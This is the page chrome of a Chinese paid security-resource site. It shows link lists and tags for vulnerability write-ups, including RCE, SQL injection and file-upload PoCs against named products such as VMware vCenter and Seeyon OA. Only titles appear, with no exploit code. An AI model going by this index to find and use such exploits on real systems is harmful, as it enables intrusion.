                <a href="https://vip.bdziyi.com/2563/">
                    <p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i
                            class="fa fa-angle-right em12"></i></p>
                    <div class="text-ellipsis-2">
                        CVE-2021-21985_VMware_vCenter_遠程任意代碼執行漏洞_tr                    </div>
                </a>
            </div>
        </nav>
    </div>
<div class="theme-box relates relates-thumb">
            <div class="box-body notop">
                <div class="title-theme">相关推荐</div>
            </div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6326</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58091/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶EAS autoLogin.jsp远程代码执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶EAS autoLogin.jsp远程代码执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2430</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58988/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="百度网盘Windows客户端存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">百度网盘Windows客户端存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">百度网盘Windows客户端存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年9月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2300</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58241/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="大华 evo-runs/v1.0/receive RCE-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">大华 evo-runs/v1.0/receive RCE</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">大华 evo-runs/v1.0/receive RCE</div><div class="px12 opacity8 mt6"><item>2025年7月11日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1988</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58301/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="wps 远程代码执行 rce-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">wps 远程代码执行 rce</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">wps 远程代码执行 rce</div><div class="px12 opacity8 mt6"><item>2025年7月18日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1827</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58089/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1705</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments">
	<div class="box-body notop">
		<div class="title-theme">评论			<small>抢沙发</small></div>
	</div>

	<div class="no_webshot main-bg theme-box box-body radius8 main-shadow">
									<div class="comment-signarea text-center box-body radius8">
					<h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3>
					<p>
						<a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a>
						<a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a>					</p>
					<p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2491%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div>				</div>
									<div id="postcomments">
			<ol class="commentlist list-unstyled">
				<div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div>			</ol>
		</div>
			</div>
</div>        </div>
    </div>
    <div class="sidebar">
	<div class="mb20"><div class="box-body notop"><div class="title-theme">作者</div></div><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img  class="lazyload fit-cover user-cover user-cover-id-1" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126045446604.png" alt="用户封面"></div>
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共8篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>8</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共960条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>960</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共353个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>353</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 171W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>171W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div>
                    
                </div>
            </div>
            <div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60912/">紫光电子档案管理系统存在目录遍历</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60911/">英赛特互联网客户服务平台shrz.asp 存在 SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60910/">英赛特互联网客户服务平台jctxx.asp jcid 存在 SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60908/">漏洞扫描和修复培训.pptx</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60892/">东胜物流软件 GetAuthorityRange 存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60891/">用友-时空KSOA chatconfirm 存在SQL注入</a></div></div>
        </div>
    </div></div><div></div><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-red">1</span><a  href="https://vip.bdziyi.com/60846/">致远OA checkComponentFile后台反序列化任意命令执行<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月17日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>901</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-yellow">2</span><a  href="https://vip.bdziyi.com/60876/">金和OA AjaxForDepartmentCollect.ashx SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月20日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>672</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-purple">3</span><a  href="https://vip.bdziyi.com/60874/">offsec WEB-300 课程：高级 Web 攻击和利用<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月21日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 jb-vip1"  data-toggle="tooltip" title="付费资源"><img  class="lazyload img-icon mr3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员">会员专属</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>671</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-blue">4</span><a  href="https://vip.bdziyi.com/60866/">友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月18日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>665</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-green">5</span><a  href="https://vip.bdziyi.com/60892/">东胜物流软件 GetAuthorityRange 存在SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月22日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>663</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 ">6</span><a  href="https://vip.bdziyi.com/60858/">安友固定资产管理系统 DoUpload 存在任意文件上传<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月18日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow"  data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>657</item></div></div></div></div></div></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="zib-widget widget-tag-cloud author-tag"><a href="https://vip.bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but c-green">龙浏览器未引用的服务路径特权升级</a><a href="https://vip.bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but c-purple">齿轮地理位置查询</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red">鼠标鼠标按钮命令注入远程</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but ">鼠标远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-blue-2">鼠标远程代码</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-yellow-2">鼠标路径遍历</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but c-green-2">鼠标本地文件包含</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-purple-2">鼠标未引用的服务路径</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but c-red-2">鼠标事件状态栏</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-blue">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-yellow">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-green">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but c-purple">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but ">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-blue-2">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-yellow-2">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-green-2">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-purple-2">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but c-red-2">默认和弱加密</a></div></div></div></main>
<div class="container fluid-widget"></div><footer class="footer">
		<div class="container-fluid container-footer">
		<ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库">
                    <img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload" style="height: 40px;">
                </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a>
<a href="https://www.gpt-all.chat/">AI大全 集合网站</a></p><div class="footer-muted em09">Copyright © 2025 · <a href="https://vip.bdziyi.com">棉花糖会员站</a>
<p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">
蜀ICP备2025159183号-1</a></p><a href="https://beian.mps.gov.cn/#/query/webSearch?code=51152402000171"
   target="_blank"
   rel="noreferrer"
   style="display:inline-flex; align-items:center; text-decoration:none; color:#fbbc05;">
  <img src="https://beian.mps.gov.cn/web/assets/logo01.6189a29f.png"
       alt="公安备案图标"
       style="height:20px; border:none; margin-right:0.5em;">
  川公网安备51152402000171号
</a></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信">
            <p>
            <img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫码加微信-棉花糖会员站">
            </p>
            <span class="opacity8 em09">扫码加微信</span>
        </div></li></ul>	</div>
</footer>
<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/vip\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/zibll\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
    <script type="text/javascript">
        window._win = {
            views: '2491',
            www: 'https://vip.bdziyi.com',
            uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
            ver: '8.3',
            imgbox: '1',
            imgbox_type: 'group',
            imgbox_thumbs: '1',
            imgbox_zoom: '1',
            imgbox_full: '1',
            imgbox_play: '1',
            imgbox_down: '1',
            sign_type: 'modal',
            signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2491%2F',
            signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2491%2F',
            ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
            ajaxpager: '',
            ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
            ajax_nomore: '没有更多内容了',
            qj_loading: '1',
            highlight_kg: '1',
            highlight_hh: '1',
            highlight_btn: '1',
            highlight_zt: 'dracula',
            highlight_white_zt: 'enlighter',
            highlight_dark_zt: 'dracula',
            upload_img_size: '3',
            img_upload_multiple: '20',
            upload_video_size: '30',
            upload_file_size: '30',
            upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|heif|heics|heifs|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|x-wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
            user_upload_nonce: '15397a1209',
            is_split_upload: '1',
            split_minimum_size: '20',
            comment_upload_img: '1'
        }
    </script>
<div class="float-right round position-bottom scroll-down-hide"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn">
                    <svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg>
                    <div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div>
